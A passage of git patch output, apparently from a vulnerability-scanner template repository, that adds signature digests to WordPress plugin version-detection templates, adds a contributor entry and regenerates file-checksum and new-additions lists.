4b0a00483046022100ec223bbfa067b330ec119bef1dee0c38ab691efd9ad63e9a8c27e0d03a04dc56022100b3bb8a361cfb0734e4c8b71dab55c52ee7da74ddfb03dd769309e24583eccfd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..0048c0777f 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100be540b2e9bee15654ddcb1ec44e89ad750ff15741a1c8410a06a8d7f58dc3e5e022037f4398e08c50d0142559da1e44575f9f292eb3fbcb25581299610e08b95a7e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..71c5f51330 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022039ad629e27d09ecc4c8131eed57d51f03316acfb3755cd076221baa4d5765f1002203b09394dbc4cf9914fb10ea2ac67e36c8c05ce94a04d59912fa3f214f17c75b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..6d67771f94 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b4df076b70ef7fedb0803969427a32ece3596536555893aa5053b312a135eb4a022100f4d04ef930c9bc29cf194ae894d2639a47609eb763c675eac6abf444ef824f79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..3551f789ea 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022040a34ec6ab97b7f0c1659ffaac28f0038af55d767601fca783adf5345fe18103022100c2daf2f5243bab925cc6066a97f9f8d72f1125d6a218651ddb66096dd812a01a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..f8d601526c 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008a325c0f6c9a3c32a34b9c6f9c5cc234e9c499432ff2449f50f14a518510820f022100a5bbd65ea971441b69e768fb0d08ce7566ba97c336e5d72d4039bccfd118bb83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..1130fb1bb2 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402200cc328fa2f8e038d68c03aa5ed97762150204a5bb2eff46fc88eee8bc15d4c9e022057cb075d704e201fdb54cf8e6f8400c8616f242a18f097147ca1ee1480939a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..dc9017901b 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c08a48c6bf29bd9dea1b53d3f4d364e686ff3e151bc1b7b964e21a501b7b982a022100d62609aa5229ea3401c0c54698d548df3280d56fc16e191b086b95ae2cfec138:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..555351f596 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100ccf04d907ffcbf83ce872c55865ca0b7163ba4d6f8dced9442684676c880911902201073c0ab99773d8a6ee1325533e62d8d6aeb88381d262ff6612799dc611fcbd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..7d2abb98d1 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b027f2bd9feccd8df845f583df85af75d5e2c1f69a5f692929a0966f2e201e7b02206bb658a316dcb5ac0e644356b30a87dbf062779ac75847fa31c0065fd16edc9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..94fffa4ff0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022074e33659605fc17d5751d5f8b1f5e2ab1ac15913d15ed7395100ece4ee80ae80022100ac633732e8275eb0beadba6312da9f721400ad6015273b77a2172972b0c5602b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..e7b328aa6f 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022014be7884f9bc0e2e9be7178ea0081c04795aa2b4c26545ec61286ae21738e070022100b97467ab7c15fa2e3c07afd546d516e84244794216b350870ca8ad5224a10e4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..f3f9206275 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e18dddeab51f44660be47dc5dc67ae3c0954fa30541b59005b4b211d015442c2022100d52817a9228b9b732c0f18a480d0020632d383f161d6f354cf449a7bb6dc0293:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..0dcb121ecc 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022053ead60379435009f71c464f5d6ceb109ba2cb34989d9b76c51cbc5b1193b360022100ae2f149c4181a0b0a86e42985348555948b252d044538c4819570d0c0c6452f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..a47728cf4c 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f74ea8428feb6d16a1efc29bb08d3e98e8fdf7974863c6d2072bf99b8c5cfe4102204c9417ee708752a94f580072d035ffbd21032421f52365fe419cf71cf82a5008:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..761a3b3adc 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022075fc534c645ee4f887e8bd994c28afc9958835126a576c0e97bd5e33389d97bf02205eb2a37461c4be98a2bec77b57c20c1f7d3c18614af59b46dfc9721923a908ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..386d77be51 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204c0446deed8a7e7958ad61e9b105a5cda1be9ba320fe2279f66714859e4a54c8022100fb811dfdadcbab87ffba8493bd3ef5af90c3d02f831f551361b7877498f69f5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..ee8478c4ef 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402200d66477a3f29569dfe2e7d6d2084440ade4b70a50133988bc6badfbf42a1fe1b0220173d91926138c152d5def8717c7b7765fa3d3e73f4790298d8036b545686cae7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d01ddfb77b81c5d663c8a52f1d77e35a51e2fecb Mon Sep 17 00:00:00 2001 From: Edoardo Ottavianelli Date: Wed, 16 Oct 2024 08:46:57 +0200 Subject: [PATCH 165/218] Update contributors.json --- contributors.json | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/contributors.json b/contributors.json index 3c9f71c42b..4a9e55ea99 100644 --- a/contributors.json +++ b/contributors.json @@ -1447,5 +1447,15 @@ "website": "", "email": "" } + }, + { + "author": "edoardottt", + "links": { + "github": "https://github.com/edoardottt", + "twitter": "https://twitter.com/edoardottt2", + "linkedin": "https://www.linkedin.com/in/edoardoottavianelli/", + "website": "https://edoardoottavianelli.it/", + "email": "" + } } ] From 417e0f11286acb313b436220702c0f781268289d Mon Sep 17 00:00:00 2001 From: ghost Date: Wed, 16 Oct 2024 06:47:27 +0000 Subject: [PATCH 166/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5346cceaee..73a908155e 100644 --- a/.new-additions +++ b/.new-additions @@ -13,6 +13,7 @@ http/cves/2024/CVE-2024-32738.yaml http/cves/2024/CVE-2024-39713.yaml http/cves/2024/CVE-2024-43360.yaml http/cves/2024/CVE-2024-44349.yaml +http/cves/2024/CVE-2024-45488.yaml http/cves/2024/CVE-2024-5910.yaml http/exposed-panels/paloalto-expedition-panel.yaml http/exposed-panels/traccar-panel.yaml From 97c45d2e88475024f8bb11380951fe0aab357edf Mon Sep 17 00:00:00 2001 From: ghost Date: Wed, 16 Oct 2024 06:47:29 +0000 Subject: [PATCH 167/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 413 +++++++++++++++++++++-------------------- 1 file changed, 207 insertions(+), 206 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3e221ee8db..f09a387743 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -418,8 +418,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:266cec9d376848a1d984f73796e31c9cd3c83019 -cves.json-checksum.txt:8d737f04ec96ab6a82c08a971eef5cef33a61260 +cves.json:27f568daedd2ba953d36370fbe64c180fa3951ab +cves.json-checksum.txt:d6ac2d43af767410723bd9c2169d2ae9bb6168aa dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -1849,8 +1849,8 @@ http/cves/2018/CVE-2018-6200.yaml:3e6473129d625093af721e2e6cac53ac702aa99c http/cves/2018/CVE-2018-6530.yaml:c9f5fd5828e6825e4e2429b612b21820ef7e8e48 http/cves/2018/CVE-2018-6605.yaml:4c52ab31c5528441d5cdb88b6da9eee6ee7197e0 http/cves/2018/CVE-2018-6910.yaml:1662c242773d5c5b17b063fd3f30a958c575b8bd -http/cves/2018/CVE-2018-7192.yaml:56c2e46e37828e8b47e8556bdb555a689fe923f8 -http/cves/2018/CVE-2018-7193.yaml:fd5986d55ce81a723472f363e7830935e885132b +http/cves/2018/CVE-2018-7192.yaml:dee261f7aef33a023318b6f6dcee55fbb226c73f +http/cves/2018/CVE-2018-7193.yaml:679664380d57f276bde1113eccdb51b317021a1f http/cves/2018/CVE-2018-7196.yaml:f429202bd8cd7b3c55a17c31ab4aef9cceb5e871 http/cves/2018/CVE-2018-7251.yaml:35bdb470f05dec3b89486bd31a38d23be7d85346 http/cves/2018/CVE-2018-7282.yaml:be0c74b3dbba955d79d30c81b2fdc9e89502a91b @@ -3247,7 +3247,7 @@ http/cves/2023/CVE-2023-1177.yaml:ab4b55e867e4a8f730b51207ffea03e8053bf1d1 http/cves/2023/CVE-2023-1263.yaml:954755ea23eaab8dbf35c5b53d78ae5642ac7c11 http/cves/2023/CVE-2023-1315.yaml:2178e336e062101eb8b803c9d4623a65d90ac012 http/cves/2023/CVE-2023-1317.yaml:bc90b04475017347f029200a10707ee655152170 -http/cves/2023/CVE-2023-1318.yaml:ea3c10e7f03f90e250dce9dbff027f5b0617a510 +http/cves/2023/CVE-2023-1318.yaml:e71827e51da108f102f00a8d10b1b9d2a862fab1 http/cves/2023/CVE-2023-1362.yaml:6e432a7601e15e3e50f24c19ef101f6395404113 http/cves/2023/CVE-2023-1408.yaml:2c3e73f4296c1f9606b8e377436ebdbfe1f715e2 http/cves/2023/CVE-2023-1434.yaml:93e41771aad3b211bd99c40258acee718147332a @@ -3757,7 +3757,7 @@ http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74 http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c http/cves/2024/CVE-2024-32709.yaml:de0592811b331a6594fdf4e4b4f4539766ad0ade http/cves/2024/CVE-2024-3273.yaml:fe07da69c4e263410727d688d92f4e06000f5c00 -http/cves/2024/CVE-2024-32735.yaml:d363899f99a4dec9b609cbbf9e9cc7e10f1376b4 +http/cves/2024/CVE-2024-32735.yaml:63e17a4aa2eac2b360754c270259e96965af82c8 http/cves/2024/CVE-2024-32736.yaml:6d6ddae0457fcd129b2fc3ad7df24a4e39a4edf1 http/cves/2024/CVE-2024-32737.yaml:b3a7a503bd4f1a789e32b432926c1aa633e1e67a http/cves/2024/CVE-2024-32738.yaml:714e1dc5026978b0c243a1d083f3ebd4ec864441 @@ -3834,6 +3834,7 @@ http/cves/2024/CVE-2024-45195.yaml:331e8730b2a9485b6a15057b67ce083f07c264a4 http/cves/2024/CVE-2024-45241.yaml:b32e4a46b08b7411b242362dafe333b209224ebb http/cves/2024/CVE-2024-45388.yaml:433afc604e847a5a8cc2d0d16687e3dce376a1c7 http/cves/2024/CVE-2024-45440.yaml:42079bcfe2123af3a6f602a0873e4ea18e363377 +http/cves/2024/CVE-2024-45488.yaml:add991b00cafd5efca3f4dcfaf0ac206768c1cf5 http/cves/2024/CVE-2024-45507.yaml:0fba89faecb014ecb7f810822ee27c3e77c50f82 http/cves/2024/CVE-2024-45622.yaml:f22751185098b16cd3d6b473bb5e8c70e692cf11 http/cves/2024/CVE-2024-4577.yaml:b256c274afc84e3b8b73d54740a9f2e77c8e4ee6 @@ -7838,236 +7839,236 @@ http/technologies/windows-communication-foundation-detect.yaml:b52558d968a07f23d http/technologies/wing-ftp-service-detect.yaml:92a8c8080c423ecdbe008bff39e4363d22ce995f http/technologies/wms-server-detect.yaml:5b24766a9022a18cc343b60f0381f69ce70a0b4d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:8230dfc92a4592b78bcafd7c478550456c256dc3 +http/technologies/wordpress/plugins/add-to-any.yaml:2098dbc990c0a1005c96222845b0bd518df2eeb5 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:3fe3690cc0131aceeea286d7591f4b2274a2bf48 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:3d9f47877f12c2c3e1e8243e41043bb3c568ba7a -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:29c4d8c18e278343480d88a4b240364870a7cd5f +http/technologies/wordpress/plugins/akismet.yaml:94b35f1ffd0429ceebbdfa46867ce2780958462a http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e010806b57fec6aed684513a3d445f1e836228b6 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:d40772610e8f19686ba461fc65e422d7289d0eda +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:3c9e3982e049e093ccdeef6d30786068606a6888 +http/technologies/wordpress/plugins/amp.yaml:6ed6b26ac631a3b0af15f158448e5b8f26bb6610 +http/technologies/wordpress/plugins/antispam-bee.yaml:c573b8e2c4002849264538eaf5c150bbfdce62ae +http/technologies/wordpress/plugins/astra-sites.yaml:afe2f518e45cc230000d9604305156d545f87fae http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:4a4148493de40c756d2829cbfbd4bed442a270bf +http/technologies/wordpress/plugins/autoptimize.yaml:1dcf06b1d44294ae7b184382e9945f035b345e6e +http/technologies/wordpress/plugins/backwpup.yaml:7e77cac4cae801649b0214ceb1f73c21b66ed0c4 +http/technologies/wordpress/plugins/better-search-replace.yaml:68c5d3a7b77b980ffb5550bea65409a5b8f3dc61 +http/technologies/wordpress/plugins/better-wp-security.yaml:bd08f8746a5cd0827b895c2bf2801d990569042b +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:abe3882099db0cf57432d61ac49d9c44e6f1765a +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:4aa97da8469ea935142517c86315acb561e4eda7 +http/technologies/wordpress/plugins/breeze.yaml:72437f7cf22b89bac4bd8ad48352f0dc8be89b7d +http/technologies/wordpress/plugins/broken-link-checker.yaml:ea840922e06275bd637e119845eff00cb70845aa http/technologies/wordpress/plugins/burst-statistics.yaml:8ae381b1138e0ed2a3121f84c7e14d33a6d6ed8a -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/chaty.yaml:a6d483f3462a589c0791b225e47c71d75d15d95b +http/technologies/wordpress/plugins/child-theme-configurator.yaml:b24d8bb234460308e1655ca7888a33e52e48e069 +http/technologies/wordpress/plugins/classic-editor.yaml:2f84527650f38b4a7e2efa0a347f9cef933f6223 +http/technologies/wordpress/plugins/classic-widgets.yaml:fb8af1486b121cee05cb1536bc17f5ae53c82079 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:5a6e9d0817f05f1737d9ef0544292422281db20b http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:02b01785c66dee2c06b91fd257f5ea08b8d557c6 -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:85ed4754232635fa21a85b407d4cff31d35387c9 -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:17ec8845a573d9a4dac064944ee90a50af3e8f06 +http/technologies/wordpress/plugins/coblocks.yaml:ee6ce652eb1739dc7c2e97cb82ad96fa91b29a74 +http/technologies/wordpress/plugins/code-snippets.yaml:bcc987741a30cc430aff3876e3c449f207f227d1 +http/technologies/wordpress/plugins/coming-soon.yaml:2fbb10b1ea68f6485cc29a5589f4c1fbce0f31dc +http/technologies/wordpress/plugins/complianz-gdpr.yaml:e243bf1a183195b14b0752e45eebb64e62d26357 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:36fc6384c0fd9cb81abc64ceada7743d5928b168 +http/technologies/wordpress/plugins/contact-form-7.yaml:168ec0ecc42d7bb36c4afedac6cbeeec950c1d50 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:f0a2cb271fe4884418048f2f300e36febaf4cde6 +http/technologies/wordpress/plugins/cookie-law-info.yaml:96edc79177f158a16bc00ffff7d1835a462093fc +http/technologies/wordpress/plugins/cookie-notice.yaml:25e0b387e6d4da7dafdb89cff9b7a03edd42a9d9 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:dc1dd2bd0232304c1c601d5a1ee4a1e69da27ec5 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:419e9c963b63a1475b57b90f146d600b566104d3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2ec4ff55bc3341e01e84baff2bfe5755cd2ec8a5 +http/technologies/wordpress/plugins/custom-css-js.yaml:74cf5027a3e7fc28f29167955d1fdf818c4911b4 +http/technologies/wordpress/plugins/custom-fonts.yaml:349938e612ffeab74b9e3a63534bcc442764b520 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:d72bb5713a663f49f5f2dfc6b7b1946cb02370d8 +http/technologies/wordpress/plugins/disable-comments.yaml:d1a772efd1cb589f52cb7cfbdb55490732b5b756 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:e33eeda99f0aed363cd4858dd533d44c4a1e98e8 +http/technologies/wordpress/plugins/duplicate-page.yaml:039ec4470e85f55d4ab047729b090de6d4add8b5 +http/technologies/wordpress/plugins/duplicate-post.yaml:d0a6e059b5fe49e816645074e1d196f61ef4d693 +http/technologies/wordpress/plugins/duplicator.yaml:7007c32b7d0004deb232e99a7f8e3046a31b876f +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:fea265cbe41d85537efbadf731a87f0bc039cd4f http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:78b3c78912cbdc4c8349bef72fd8fd6fa24beb21 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 